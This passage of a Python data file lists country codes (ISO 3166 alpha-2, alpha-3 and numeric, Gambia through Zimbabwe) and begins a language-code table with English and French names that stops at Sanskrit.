('GM', 'GMB', '270', u'Gambia'),
('GE', 'GEO', '268', u'Georgia'),
('DE', 'DEU', '276', u'Germany'),
('GH', 'GHA', '288', u'Ghana'),
('GI', 'GIB', '292', u'Gibraltar'),
('GR', 'GRC', '300', u'Greece'),
('GL', 'GRL', '304', u'Greenland'),
('GD', 'GRD', '308', u'Grenada'),
('GP', 'GLP', '312', u'Guadeloupe'),
('GU', 'GUM', '316', u'Guam'),
('GT', 'GTM', '320', u'Guatemala'),
('GG', 'GGY', '831', u'Guernsey'),
('GN', 'GIN', '324', u'Guinea'),
('GW', 'GNB', '624', u'Guinea-Bissau'),
('GY', 'GUY', '328', u'Guyana'),
('HT', 'HTI', '332', u'Haiti'),
('HM', 'HMD', '334', u'Heard Island and McDonald Islands'),
('VA', 'VAT', '336', u'Holy See (Vatican City State)'),
('HN', 'HND', '340', u'Honduras'),
('HK', 'HKG', '344', u'Hong Kong'),
('HU', 'HUN', '348', u'Hungary'),
('IS', 'ISL', '352', u'Iceland'),
('IN', 'IND', '356', u'India'),
('ID', 'IDN', '360', u'Indonesia'),
('IR', 'IRN', '364', u'Iran, Islamic Republic of'),
('IQ', 'IRQ', '368', u'Iraq'),
('IE', 'IRL', '372', u'Ireland'),
('IM', 'IMN', '833', u'Isle of Man'),
('IL', 'ISR', '376', u'Israel'),
('IT', 'ITA', '380', u'Italy'),
('JM', 'JAM', '388', u'Jamaica'),
('JP', 'JPN', '392', u'Japan'),
('JE', 'JEY', '832', u'Jersey'),
('JO', 'JOR', '400', u'Jordan'),
('KZ', 'KAZ', '398', u'Kazakhstan'),
('KE', 'KEN', '404', u'Kenya'),
('KI', 'KIR', '296', u'Kiribati'),
('KP', 'PRK', '408', u'Korea, Democratic People\'s Republic of'),
('KR', 'KOR', '410', u'Korea, Republic of'),
('KW', 'KWT', '414', u'Kuwait'),
('KG', 'KGZ', '417', u'Kyrgyzstan'),
('LA', 'LAO', '418', u'Lao People\'s Democratic Republic'),
('LV', 'LVA', '428', u'Latvia'),
('LB', 'LBN', '422', u'Lebanon'),
('LS', 'LSO', '426', u'Lesotho'),
('LR', 'LBR', '430', u'Liberia'),
('LY', 'LBY', '434', u'Libya'),
('LI', 'LIE', '438', u'Liechtenstein'),
('LT', 'LTU', '440', u'Lithuania'),
('LU', 'LUX', '442', u'Luxembourg'),
('MO', 'MAC', '446', u'Macao'),
('MK', 'MKD', '807', u'Macedonia, Republic of'),
('MG', 'MDG', '450', u'Madagascar'),
('MW', 'MWI', '454', u'Malawi'),
('MY', 'MYS', '458', u'Malaysia'),
('MV', 'MDV', '462', u'Maldives'),
('ML', 'MLI', '466', u'Mali'),
('MT', 'MLT', '470', u'Malta'),
('MH', 'MHL', '584', u'Marshall Islands'),
('MQ', 'MTQ', '474', u'Martinique'),
('MR', 'MRT', '478', u'Mauritania'),
('MU', 'MUS', '480', u'Mauritius'),
('YT', 'MYT', '175', u'Mayotte'),
('MX', 'MEX', '484', u'Mexico'),
('FM', 'FSM', '583', u'Micronesia, Federated States of'),
('MD', 'MDA', '498', u'Moldova, Republic of'),
('MC', 'MCO', '492', u'Monaco'),
('MN', 'MNG', '496', u'Mongolia'),
('ME', 'MNE', '499', u'Montenegro'),
('MS', 'MSR', '500', u'Montserrat'),
('MA', 'MAR', '504', u'Morocco'),
('MZ', 'MOZ', '508', u'Mozambique'),
('MM', 'MMR', '104', u'Myanmar'),
('NA', 'NAM', '516', u'Namibia'),
('NR', 'NRU', '520', u'Nauru'),
('NP', 'NPL', '524', u'Nepal'),
('NL', 'NLD', '528', u'Netherlands'),
('NC', 'NCL', '540', u'New Caledonia'),
('NZ', 'NZL', '554', u'New Zealand'),
('NI', 'NIC', '558', u'Nicaragua'),
('NE', 'NER', '562', u'Niger'),
('NG', 'NGA', '566', u'Nigeria'),
('NU', 'NIU', '570', u'Niue'),
('NF', 'NFK', '574', u'Norfolk Island'),
('MP', 'MNP', '580', u'Northern Mariana Islands'),
('NO', 'NOR', '578', u'Norway'),
('OM', 'OMN', '512', u'Oman'),
('PK', 'PAK', '586', u'Pakistan'),
('PW', 'PLW', '585', u'Palau'),
('PS', 'PSE', '275', u'Palestinian Territory, Occupied'),
('PA', 'PAN', '591', u'Panama'),
('PG', 'PNG', '598', u'Papua New Guinea'),
('PY', 'PRY', '600', u'Paraguay'),
('PE', 'PER', '604', u'Peru'),
('PH', 'PHL', '608', u'Philippines'),
('PN', 'PCN', '612', u'Pitcairn'),
('PL', 'POL', '616', u'Poland'),
('PT', 'PRT', '620', u'Portugal'),
('PR', 'PRI', '630', u'Puerto Rico'),
('QA', 'QAT', '634', u'Qatar'),
('RE', 'REU', '638', u'Réunion'),
('RO', 'ROU', '642', u'Romania'),
('RU', 'RUS', '643', u'Russian Federation'),
('RW', 'RWA', '646', u'Rwanda'),
('BL', 'BLM', '652', u'Saint Barthélemy'),
('SH', 'SHN', '654', u'Saint Helena, Ascension and Tristan da Cunha'),
('KN', 'KNA', '659', u'Saint Kitts and Nevis'),
('LC', 'LCA', '662', u'Saint Lucia'),
('MF', 'MAF', '663', u'Saint Martin (French part)'),
('PM', 'SPM', '666', u'Saint Pierre and Miquelon'),
('VC', 'VCT', '670', u'Saint Vincent and the Grenadines'),
('WS', 'WSM', '882', u'Samoa'),
('SM', 'SMR', '674', u'San Marino'),
('ST', 'STP', '678', u'Sao Tome and Principe'),
('SA', 'SAU', '682', u'Saudi Arabia'),
('SN', 'SEN', '686', u'Senegal'),
('RS', 'SRB', '688', u'Serbia'),
('SC', 'SYC', '690', u'Seychelles'),
('SL', 'SLE', '694', u'Sierra Leone'),
('SG', 'SGP', '702', u'Singapore'),
('SX', 'SXM', '534', u'Sint Maarten (Dutch part)'),
('SK', 'SVK', '703', u'Slovakia'),
('SI', 'SVN', '705', u'Slovenia'),
('SB', 'SLB', '090', u'Solomon Islands'),
('SO', 'SOM', '706', u'Somalia'),
('ZA', 'ZAF', '710', u'South Africa'),
('GS', 'SGS', '239', u'South Georgia and the South Sandwich Islands'),
('ES', 'ESP', '724', u'Spain'),
('LK', 'LKA', '144', u'Sri Lanka'),
('SD', 'SDN', '729', u'Sudan'),
('SR', 'SUR', '740', u'Suriname'),
('SS', 'SSD', '728', u'South Sudan'),
('SJ', 'SJM', '744', u'Svalbard and Jan Mayen'),
('SZ', 'SWZ', '748', u'Swaziland'),
('SE', 'SWE', '752', u'Sweden'),
('CH', 'CHE', '756', u'Switzerland'),
('SY', 'SYR', '760', u'Syrian Arab Republic'),
('TW', 'TWN', '158', u'Taiwan, Province of China'),
('TJ', 'TJK', '762', u'Tajikistan'),
('TZ', 'TZA', '834', u'Tanzania, United Republic of'),
('TH', 'THA', '764', u'Thailand'),
('TL', 'TLS', '626', u'Timor-Leste'),
('TG', 'TGO', '768', u'Togo'),
('TK', 'TKL', '772', u'Tokelau'),
('TO', 'TON', '776', u'Tonga'),
('TT', 'TTO', '780', u'Trinidad and Tobago'),
('TN', 'TUN', '788', u'Tunisia'),
('TR', 'TUR', '792', u'Turkey'),
('TM', 'TKM', '795', u'Turkmenistan'),
('TC', 'TCA', '796', u'Turks and Caicos Islands'),
('TV', 'TUV', '798', u'Tuvalu'),
('UG', 'UGA', '800', u'Uganda'),
('UA', 'UKR', '804', u'Ukraine'),
('AE', 'ARE', '784', u'United Arab Emirates'),
('GB', 'GBR', '826', u'United Kingdom'),
('US', 'USA', '840', u'United States'),
('UM', 'UMI', '581', u'United States Minor Outlying Islands'),
('UY', 'URY', '858', u'Uruguay'),
('UZ', 'UZB', '860', u'Uzbekistan'),
('VU', 'VUT', '548', u'Vanuatu'),
('VE', 'VEN', '862', u'Venezuela, Bolivarian Republic of'),
('VN', 'VNM', '704', u'Viet Nam'),
('VG', 'VGB', '092', u'Virgin Islands, British'),
('VI', 'VIR', '850', u'Virgin Islands, U.S.'),
('WF', 'WLF', '876', u'Wallis and Futuna'),
('EH', 'ESH', '732', u'Western Sahara'),
('YE', 'YEM', '887', u'Yemen'),
('ZM', 'ZMB', '894', u'Zambia'),
('ZW', 'ZWE', '716', u'Zimbabwe')]
LANGUAGES = [('aar', '', 'aa', u'Afar', u'afar'),
('abk', '', 'ab', u'Abkhazian', u'abkhaze'),
('ace', '', '', u'Achinese', u'aceh'),
('ach', '', '', u'Acoli', u'acoli'),
('ada', '', '', u'Adangme', u'adangme'),
('ady', '', '', u'Adyghe; Adygei', u'adyghé'),
('afa', '', '', u'Afro-Asiatic languages', u'afro-asiatiques, langues'),
('afh', '', '', u'Afrihili', u'afrihili'),
('afr', '', 'af', u'Afrikaans', u'afrikaans'),
('ain', '', '', u'Ainu', u'aïnou'),
('aka', '', 'ak', u'Akan', u'akan'),
('akk', '', '', u'Akkadian', u'akkadien'),
('alb', 'sqi', 'sq', u'Albanian', u'albanais'),
('ale', '', '', u'Aleut', u'aléoute'),
('alg', '', '', u'Algonquian languages', u'algonquines, langues'),
('alt', '', '', u'Southern Altai', u'altai du Sud'),
('amh', '', 'am', u'Amharic', u'amharique'),
('ang', '', '', u'English, Old (ca.450-1100)', u'anglo-saxon (ca.450-1100)'),
('anp', '', '', u'Angika', u'angika'),
('apa', '', '', u'Apache languages', u'apaches, langues'),
('ara', '', 'ar', u'Arabic', u'arabe'),
('arc', '', '', u'Official Aramaic (700-300 BCE); Imperial Aramaic (700-300 BCE)', u'araméen d\'empire (700-300 BCE)'),
('arg', '', 'an', u'Aragonese', u'aragonais'),
('arm', 'hye', 'hy', u'Armenian', u'arménien'),
('arn', '', '', u'Mapudungun; Mapuche', u'mapudungun; mapuche; mapuce'),
('arp', '', '', u'Arapaho', u'arapaho'),
('art', '', '', u'Artificial languages', u'artificielles, langues'),
('arw', '', '', u'Arawak', u'arawak'),
('asm', '', 'as', u'Assamese', u'assamais'),
('ast', '', '', u'Asturian; Bable; Leonese; Asturleonese', u'asturien; bable; léonais; asturoléonais'),
('ath', '', '', u'Athapascan languages', u'athapascanes, langues'),
('aus', '', '', u'Australian languages', u'australiennes, langues'),
('ava', '', 'av', u'Avaric', u'avar'),
('ave', '', 'ae', u'Avestan', u'avestique'),
('awa', '', '', u'Awadhi', u'awadhi'),
('aym', '', 'ay', u'Aymara', u'aymara'),
('aze', '', 'az', u'Azerbaijani', u'azéri'),
('bad', '', '', u'Banda languages', u'banda, langues'),
('bai', '', '', u'Bamileke languages', u'bamiléké, langues'),
('bak', '', 'ba', u'Bashkir', u'bachkir'),
('bal', '', '', u'Baluchi', u'baloutchi'),
('bam', '', 'bm', u'Bambara', u'bambara'),
('ban', '', '', u'Balinese', u'balinais'),
('baq', 'eus', 'eu', u'Basque', u'basque'),
('bas', '', '', u'Basa', u'basa'),
('bat', '', '', u'Baltic languages', u'baltes, langues'),
('bej', '', '', u'Beja; Bedawiyet', u'bedja'),
('bel', '', 'be', u'Belarusian', u'biélorusse'),
('bem', '', '', u'Bemba', u'bemba'),
('ben', '', 'bn', u'Bengali', u'bengali'),
('ber', '', '', u'Berber languages', u'berbères, langues'),
('bho', '', '', u'Bhojpuri', u'bhojpuri'),
('bih', '', 'bh', u'Bihari languages', u'langues biharis'),
('bik', '', '', u'Bikol', u'bikol'),
('bin', '', '', u'Bini; Edo', u'bini; edo'),
('bis', '', 'bi', u'Bislama', u'bichlamar'),
('bla', '', '', u'Siksika', u'blackfoot'),
('bnt', '', '', u'Bantu (Other)', u'bantoues, autres langues'),
('bos', '', 'bs', u'Bosnian', u'bosniaque'),
('bra', '', '', u'Braj', u'braj'),
('bre', '', 'br', u'Breton', u'breton'),
('btk', '', '', u'Batak languages', u'batak, langues'),
('bua', '', '', u'Buriat', u'bouriate'),
('bug', '', '', u'Buginese', u'bugi'),
('bul', '', 'bg', u'Bulgarian', u'bulgare'),
('bur', 'mya', 'my', u'Burmese', u'birman'),
('byn', '', '', u'Blin; Bilin', u'blin; bilen'),
('cad', '', '', u'Caddo', u'caddo'),
('cai', '', '', u'Central American Indian languages', u'amérindiennes de L\'Amérique centrale, langues'),
('car', '', '', u'Galibi Carib', u'karib; galibi; carib'),
('cat', '', 'ca', u'Catalan; Valencian', u'catalan; valencien'),
('cau', '', '', u'Caucasian languages', u'caucasiennes, langues'),
('ceb', '', '', u'Cebuano', u'cebuano'),
('cel', '', '', u'Celtic languages', u'celtiques, langues; celtes, langues'),
('cha', '', 'ch', u'Chamorro', u'chamorro'),
('chb', '', '', u'Chibcha', u'chibcha'),
('che', '', 'ce', u'Chechen', u'tchétchène'),
('chg', '', '', u'Chagatai', u'djaghataï'),
('chi', 'zho', 'zh', u'Chinese', u'chinois'),
('chk', '', '', u'Chuukese', u'chuuk'),
('chm', '', '', u'Mari', u'mari'),
('chn', '', '', u'Chinook jargon', u'chinook, jargon'),
('cho', '', '', u'Choctaw', u'choctaw'),
('chp', '', '', u'Chipewyan; Dene Suline', u'chipewyan'),
('chr', '', '', u'Cherokee', u'cherokee'),
('chu', '', 'cu', u'Church Slavic; Old Slavonic; Church Slavonic; Old Bulgarian; Old Church Slavonic', u'slavon d\'église; vieux slave; slavon liturgique; vieux bulgare'),
('chv', '', 'cv', u'Chuvash', u'tchouvache'),
('chy', '', '', u'Cheyenne', u'cheyenne'),
('cmc', '', '', u'Chamic languages', u'chames, langues'),
('cop', '', '', u'Coptic', u'copte'),
('cor', '', 'kw', u'Cornish', u'cornique'),
('cos', '', 'co', u'Corsican', u'corse'),
('cpe', '', '', u'Creoles and pidgins, English based', u'créoles et pidgins basés sur l\'anglais'),
('cpf', '', '', u'Creoles and pidgins, French-based ', u'créoles et pidgins basés sur le français'),
('cpp', '', '', u'Creoles and pidgins, Portuguese-based ', u'créoles et pidgins basés sur le portugais'),
('cre', '', 'cr', u'Cree', u'cree'),
('crh', '', '', u'Crimean Tatar; Crimean Turkish', u'tatar de Crimé'),
('crp', '', '', u'Creoles and pidgins ', u'créoles et pidgins'),
('csb', '', '', u'Kashubian', u'kachoube'),
('cus', '', '', u'Cushitic languages', u'couchitiques, langues'),
('cze', 'ces', 'cs', u'Czech', u'tchèque'),
('dak', '', '', u'Dakota', u'dakota'),
('dan', '', 'da', u'Danish', u'danois'),
('dar', '', '', u'Dargwa', u'dargwa'),
('day', '', '', u'Land Dayak languages', u'dayak, langues'),
('del', '', '', u'Delaware', u'delaware'),
('den', '', '', u'Slave (Athapascan)', u'esclave (athapascan)'),
('dgr', '', '', u'Dogrib', u'dogrib'),
('din', '', '', u'Dinka', u'dinka'),
('div', '', 'dv', u'Divehi; Dhivehi; Maldivian', u'maldivien'),
('doi', '', '', u'Dogri', u'dogri'),
('dra', '', '', u'Dravidian languages', u'dravidiennes, langues'),
('dsb', '', '', u'Lower Sorbian', u'bas-sorabe'),
('dua', '', '', u'Duala', u'douala'),
('dum', '', '', u'Dutch, Middle (ca.1050-1350)', u'néerlandais moyen (ca. 1050-1350)'),
('dut', 'nld', 'nl', u'Dutch; Flemish', u'néerlandais; flamand'),
('dyu', '', '', u'Dyula', u'dioula'),
('dzo', '', 'dz', u'Dzongkha', u'dzongkha'),
('efi', '', '', u'Efik', u'efik'),
('egy', '', '', u'Egyptian (Ancient)', u'égyptien'),
('eka', '', '', u'Ekajuk', u'ekajuk'),
('elx', '', '', u'Elamite', u'élamite'),
('eng', '', 'en', u'English', u'anglais'),
('enm', '', '', u'English, Middle (1100-1500)', u'anglais moyen (1100-1500)'),
('epo', '', 'eo', u'Esperanto', u'espéranto'),
('est', '', 'et', u'Estonian', u'estonien'),
('ewe', '', 'ee', u'Ewe', u'éwé'),
('ewo', '', '', u'Ewondo', u'éwondo'),
('fan', '', '', u'Fang', u'fang'),
('fao', '', 'fo', u'Faroese', u'féroïen'),
('fat', '', '', u'Fanti', u'fanti'),
('fij', '', 'fj', u'Fijian', u'fidjien'),
('fil', '', '', u'Filipino; Pilipino', u'filipino; pilipino'),
('fin', '', 'fi', u'Finnish', u'finnois'),
('fiu', '', '', u'Finno-Ugrian languages', u'finno-ougriennes, langues'),
('fon', '', '', u'Fon', u'fon'),
('fre', 'fra', 'fr', u'French', u'français'),
('frm', '', '', u'French, Middle (ca.1400-1600)', u'français moyen (1400-1600)'),
('fro', '', '', u'French, Old (842-ca.1400)', u'français ancien (842-ca.1400)'),
('frr', '', '', u'Northern Frisian', u'frison septentrional'),
('frs', '', '', u'Eastern Frisian', u'frison oriental'),
('fry', '', 'fy', u'Western Frisian', u'frison occidental'),
('ful', '', 'ff', u'Fulah', u'peul'),
('fur', '', '', u'Friulian', u'frioulan'),
('gaa', '', '', u'Ga', u'ga'),
('gay', '', '', u'Gayo', u'gayo'),
('gba', '', '', u'Gbaya', u'gbaya'),
('gem', '', '', u'Germanic languages', u'germaniques, langues'),
('geo', 'kat', 'ka', u'Georgian', u'géorgien'),
('ger', 'deu', 'de', u'German', u'allemand'),
('gez', '', '', u'Geez', u'guèze'),
('gil', '', '', u'Gilbertese', u'kiribati'),
('gla', '', 'gd', u'Gaelic; Scottish Gaelic', u'gaélique; gaélique écossais'),
('gle', '', 'ga', u'Irish', u'irlandais'),
('glg', '', 'gl', u'Galician', u'galicien'),
('glv', '', 'gv', u'Manx', u'manx; mannois'),
('gmh', '', '', u'German, Middle High (ca.1050-1500)', u'allemand, moyen haut (ca. 1050-1500)'),
('goh', '', '', u'German, Old High (ca.750-1050)', u'allemand, vieux haut (ca. 750-1050)'),
('gon', '', '', u'Gondi', u'gond'),
('gor', '', '', u'Gorontalo', u'gorontalo'),
('got', '', '', u'Gothic', u'gothique'),
('grb', '', '', u'Grebo', u'grebo'),
('grc', '', '', u'Greek, Ancient (to 1453)', u'grec ancien (jusqu\'à 1453)'),
('gre', 'ell', 'el', u'Greek, Modern (1453-)', u'grec moderne (après 1453)'),
('grn', '', 'gn', u'Guarani', u'guarani'),
('gsw', '', '', u'Swiss German; Alemannic; Alsatian', u'suisse alémanique; alémanique; alsacien'),
('guj', '', 'gu', u'Gujarati', u'goudjrati'),
('gwi', '', '', u'Gwich\'in', u'gwich\'in'),
('hai', '', '', u'Haida', u'haida'),
('hat', '', 'ht', u'Haitian; Haitian Creole', u'haïtien; créole haïtien'),
('hau', '', 'ha', u'Hausa', u'haoussa'),
('haw', '', '', u'Hawaiian', u'hawaïen'),
('heb', '', 'he', u'Hebrew', u'hébreu'),
('her', '', 'hz', u'Herero', u'herero'),
('hil', '', '', u'Hiligaynon', u'hiligaynon'),
('him', '', '', u'Himachali languages; Western Pahari languages', u'langues himachalis; langues paharis occidentales'),
('hin', '', 'hi', u'Hindi', u'hindi'),
('hit', '', '', u'Hittite', u'hittite'),
('hmn', '', '', u'Hmong; Mong', u'hmong'),
('hmo', '', 'ho', u'Hiri Motu', u'hiri motu'),
('hrv', '', 'hr', u'Croatian', u'croate'),
('hsb', '', '', u'Upper Sorbian', u'haut-sorabe'),
('hun', '', 'hu', u'Hungarian', u'hongrois'),
('hup', '', '', u'Hupa', u'hupa'),
('iba', '', '', u'Iban', u'iban'),
('ibo', '', 'ig', u'Igbo', u'igbo'),
('ice', 'isl', 'is', u'Icelandic', u'islandais'),
('ido', '', 'io', u'Ido', u'ido'),
('iii', '', 'ii', u'Sichuan Yi; Nuosu', u'yi de Sichuan'),
('ijo', '', '', u'Ijo languages', u'ijo, langues'),
('iku', '', 'iu', u'Inuktitut', u'inuktitut'),
('ile', '', 'ie', u'Interlingue; Occidental', u'interlingue'),
('ilo', '', '', u'Iloko', u'ilocano'),
('ina', '', 'ia', u'Interlingua (International Auxiliary Language Association)', u'interlingua (langue auxiliaire internationale)'),
('inc', '', '', u'Indic languages', u'indo-aryennes, langues'),
('ind', '', 'id', u'Indonesian', u'indonésien'),
('ine', '', '', u'Indo-European languages', u'indo-européennes, langues'),
('inh', '', '', u'Ingush', u'ingouche'),
('ipk', '', 'ik', u'Inupiaq', u'inupiaq'),
('ira', '', '', u'Iranian languages', u'iraniennes, langues'),
('iro', '', '', u'Iroquoian languages', u'iroquoises, langues'),
('ita', '', 'it', u'Italian', u'italien'),
('jav', '', 'jv', u'Javanese', u'javanais'),
('jbo', '', '', u'Lojban', u'lojban'),
('jpn', '', 'ja', u'Japanese', u'japonais'),
('jpr', '', '', u'Judeo-Persian', u'judéo-persan'),
('jrb', '', '', u'Judeo-Arabic', u'judéo-arabe'),
('kaa', '', '', u'Kara-Kalpak', u'karakalpak'),
('kab', '', '', u'Kabyle', u'kabyle'),
('kac', '', '', u'Kachin; Jingpho', u'kachin; jingpho'),
('kal', '', 'kl', u'Kalaallisut; Greenlandic', u'groenlandais'),
('kam', '', '', u'Kamba', u'kamba'),
('kan', '', 'kn', u'Kannada', u'kannada'),
('kar', '', '', u'Karen languages', u'karen, langues'),
('kas', '', 'ks', u'Kashmiri', u'kashmiri'),
('kau', '', 'kr', u'Kanuri', u'kanouri'),
('kaw', '', '', u'Kawi', u'kawi'),
('kaz', '', 'kk', u'Kazakh', u'kazakh'),
('kbd', '', '', u'Kabardian', u'kabardien'),
('kha', '', '', u'Khasi', u'khasi'),
('khi', '', '', u'Khoisan languages', u'khoïsan, langues'),
('khm', '', 'km', u'Central Khmer', u'khmer central'),
('kho', '', '', u'Khotanese; Sakan', u'khotanais; sakan'),
('kik', '', 'ki', u'Kikuyu; Gikuyu', u'kikuyu'),
('kin', '', 'rw', u'Kinyarwanda', u'rwanda'),
('kir', '', 'ky', u'Kirghiz; Kyrgyz', u'kirghiz'),
('kmb', '', '', u'Kimbundu', u'kimbundu'),
('kok', '', '', u'Konkani', u'konkani'),
('kom', '', 'kv', u'Komi', u'kom'),
('kon', '', 'kg', u'Kongo', u'kongo'),
('kor', '', 'ko', u'Korean', u'coréen'),
('kos', '', '', u'Kosraean', u'kosrae'),
('kpe', '', '', u'Kpelle', u'kpellé'),
('krc', '', '', u'Karachay-Balkar', u'karatchai balkar'),
('krl', '', '', u'Karelian', u'carélien'),
('kro', '', '', u'Kru languages', u'krou, langues'),
('kru', '', '', u'Kurukh', u'kurukh'),
('kua', '', 'kj', u'Kuanyama; Kwanyama', u'kuanyama; kwanyama'),
('kum', '', '', u'Kumyk', u'koumyk'),
('kur', '', 'ku', u'Kurdish', u'kurde'),
('kut', '', '', u'Kutenai', u'kutenai'),
('lad', '', '', u'Ladino', u'judéo-espagnol'),
('lah', '', '', u'Lahnda', u'lahnda'),
('lam', '', '', u'Lamba', u'lamba'),
('lao', '', 'lo', u'Lao', u'lao'),
('lat', '', 'la', u'Latin', u'latin'),
('lav', '', 'lv', u'Latvian', u'letton'),
('lez', '', '', u'Lezghian', u'lezghien'),
('lim', '', 'li', u'Limburgan; Limburger; Limburgish', u'limbourgeois'),
('lin', '', 'ln', u'Lingala', u'lingala'),
('lit', '', 'lt', u'Lithuanian', u'lituanien'),
('lol', '', '', u'Mongo', u'mongo'),
('loz', '', '', u'Lozi', u'lozi'),
('ltz', '', 'lb', u'Luxembourgish; Letzeburgesch', u'luxembourgeois'),
('lua', '', '', u'Luba-Lulua', u'luba-lulua'),
('lub', '', 'lu', u'Luba-Katanga', u'luba-katanga'),
('lug', '', 'lg', u'Ganda', u'ganda'),
('lui', '', '', u'Luiseno', u'luiseno'),
('lun', '', '', u'Lunda', u'lunda'),
('luo', '', '', u'Luo (Kenya and Tanzania)', u'luo (Kenya et Tanzanie)'),
('lus', '', '', u'Lushai', u'lushai'),
('mac', 'mkd', 'mk', u'Macedonian', u'macédonien'),
('mad', '', '', u'Madurese', u'madourais'),
('mag', '', '', u'Magahi', u'magahi'),
('mah', '', 'mh', u'Marshallese', u'marshall'),
('mai', '', '', u'Maithili', u'maithili'),
('mak', '', '', u'Makasar', u'makassar'),
('mal', '', 'ml', u'Malayalam', u'malayalam'),
('man', '', '', u'Mandingo', u'mandingue'),
('mao', 'mri', 'mi', u'Maori', u'maori'),
('map', '', '', u'Austronesian languages', u'austronésiennes, langues'),
('mar', '', 'mr', u'Marathi', u'marathe'),
('mas', '', '', u'Masai', u'massaï'),
('may', 'msa', 'ms', u'Malay', u'malais'),
('mdf', '', '', u'Moksha', u'moksa'),
('mdr', '', '', u'Mandar', u'mandar'),
('men', '', '', u'Mende', u'mendé'),
('mga', '', '', u'Irish, Middle (900-1200)', u'irlandais moyen (900-1200)'),
('mic', '', '', u'Mi\'kmaq; Micmac', u'mi\'kmaq; micmac'),
('min', '', '', u'Minangkabau', u'minangkabau'),
('mkh', '', '', u'Mon-Khmer languages', u'môn-khmer, langues'),
('mlg', '', 'mg', u'Malagasy', u'malgache'),
('mlt', '', 'mt', u'Maltese', u'maltais'),
('mnc', '', '', u'Manchu', u'mandchou'),
('mni', '', '', u'Manipuri', u'manipuri'),
('mno', '', '', u'Manobo languages', u'manobo, langues'),
('moh', '', '', u'Mohawk', u'mohawk'),
('mon', '', 'mn', u'Mongolian', u'mongol'),
('mos', '', '', u'Mossi', u'moré'),
('mun', '', '', u'Munda languages', u'mounda, langues'),
('mus', '', '', u'Creek', u'muskogee'),
('mwl', '', '', u'Mirandese', u'mirandais'),
('mwr', '', '', u'Marwari', u'marvari'),
('myn', '', '', u'Mayan languages', u'maya, langues'),
('myv', '', '', u'Erzya', u'erza'),
('nah', '', '', u'Nahuatl languages', u'nahuatl, langues'),
('nai', '', '', u'North American Indian languages', u'nord-amérindiennes, langues'),
('nap', '', '', u'Neapolitan', u'napolitain'),
('nau', '', 'na', u'Nauru', u'nauruan'),
('nav', '', 'nv', u'Navajo; Navaho', u'navaho'),
('nbl', '', 'nr', u'Ndebele, South; South Ndebele', u'ndébélé du Sud'),
('nde', '', 'nd', u'Ndebele, North; North Ndebele', u'ndébélé du Nord'),
('ndo', '', 'ng', u'Ndonga', u'ndonga'),
('nds', '', '', u'Low German; Low Saxon; German, Low; Saxon, Low', u'bas allemand; bas saxon; allemand, bas; saxon, bas'),
('nep', '', 'ne', u'Nepali', u'népalais'),
('new', '', '', u'Nepal Bhasa; Newari', u'nepal bhasa; newari'),
('nia', '', '', u'Nias', u'nias'),
('nic', '', '', u'Niger-Kordofanian languages', u'nigéro-kordofaniennes, langues'),
('niu', '', '', u'Niuean', u'niué'),
('nno', '', 'nn', u'Norwegian Nynorsk; Nynorsk, Norwegian', u'norvégien nynorsk; nynorsk, norvégien'),
('nob', '', 'nb', u'Bokmål, Norwegian; Norwegian Bokmål', u'norvégien bokmål'),
('nog', '', '', u'Nogai', u'nogaï; nogay'),
('non', '', '', u'Norse, Old', u'norrois, vieux'),
('nor', '', 'no', u'Norwegian', u'norvégien'),
('nqo', '', '', u'N\'Ko', u'n\'ko'),
('nso', '', '', u'Pedi; Sepedi; Northern Sotho', u'pedi; sepedi; sotho du Nord'),
('nub', '', '', u'Nubian languages', u'nubiennes, langues'),
('nwc', '', '', u'Classical Newari; Old Newari; Classical Nepal Bhasa', u'newari classique'),
('nya', '', 'ny', u'Chichewa; Chewa; Nyanja', u'chichewa; chewa; nyanja'),
('nym', '', '', u'Nyamwezi', u'nyamwezi'),
('nyn', '', '', u'Nyankole', u'nyankolé'),
('nyo', '', '', u'Nyoro', u'nyoro'),
('nzi', '', '', u'Nzima', u'nzema'),
('oci', '', 'oc', u'Occitan (post 1500); Provençal', u'occitan (après 1500); provençal'),
('oji', '', 'oj', u'Ojibwa', u'ojibwa'),
('ori', '', 'or', u'Oriya', u'oriya'),
('orm', '', 'om', u'Oromo', u'galla'),
('osa', '', '', u'Osage', u'osage'),
('oss', '', 'os', u'Ossetian; Ossetic', u'ossète'),
('ota', '', '', u'Turkish, Ottoman (1500-1928)', u'turc ottoman (1500-1928)'),
('oto', '', '', u'Otomian languages', u'otomi, langues'),
('paa', '', '', u'Papuan languages', u'papoues, langues'),
('pag', '', '', u'Pangasinan', u'pangasinan'),
('pal', '', '', u'Pahlavi', u'pahlavi'),
('pam', '', '', u'Pampanga; Kapampangan', u'pampangan'),
('pan', '', 'pa', u'Panjabi; Punjabi', u'pendjabi'),
('pap', '', '', u'Papiamento', u'papiamento'),
('pau', '', '', u'Palauan', u'palau'),
('peo', '', '', u'Persian, Old (ca.600-400 B.C.)', u'perse, vieux (ca. 600-400 av. J.-C.)'),
('per', 'fas', 'fa', u'Persian', u'persan'),
('phi', '', '', u'Philippine languages', u'philippines, langues'),
('phn', '', '', u'Phoenician', u'phénicien'),
('pli', '', 'pi', u'Pali', u'pali'),
('pol', '', 'pl', u'Polish', u'polonais'),
('pon', '', '', u'Pohnpeian', u'pohnpei'),
('pob', '', 'pb', u'Brazilian Portuguese', u'portugais brésilien'),
('por', '', 'pt', u'Portuguese', u'portugais'),
('pra', '', '', u'Prakrit languages', u'prâkrit, langues'),
('pro', '', '', u'Provençal, Old (to 1500)', u'provençal ancien (jusqu\'à 1500)'),
('pus', '', 'ps', u'Pushto; Pashto', u'pachto'),
('que', '', 'qu', u'Quechua', u'quechua'),
('raj', '', '', u'Rajasthani', u'rajasthani'),
('rap', '', '', u'Rapanui', u'rapanui'),
('rar', '', '', u'Rarotongan; Cook Islands Maori', u'rarotonga; maori des îles Cook'),
('roa', '', '', u'Romance languages', u'romanes, langues'),
('roh', '', 'rm', u'Romansh', u'romanche'),
('rom', '', '', u'Romany', u'tsigane'),
('rum', 'ron', 'ro', u'Romanian; Moldavian; Moldovan', u'roumain; moldave'),
('run', '', 'rn', u'Rundi', u'rundi'),
('rup', '', '', u'Aromanian; Arumanian; Macedo-Romanian', u'aroumain; macédo-roumain'),
('rus', '', 'ru', u'Russian', u'russe'),
('sad', '', '', u'Sandawe', u'sandawe'),
('sag', '', 'sg', u'Sango', u'sango'),
('sah', '', '', u'Yakut', u'iakoute'),
('sai', '', '', u'South American Indian (Other)', u'indiennes d\'Amérique du Sud, autres langues'),
('sal', '', '', u'Salishan languages', u'salishennes, langues'),
('sam', '', '', u'Samaritan Aramaic', u'samaritain'),
('san', '', 'sa', u'Sanskrit', u'sanskrit'),
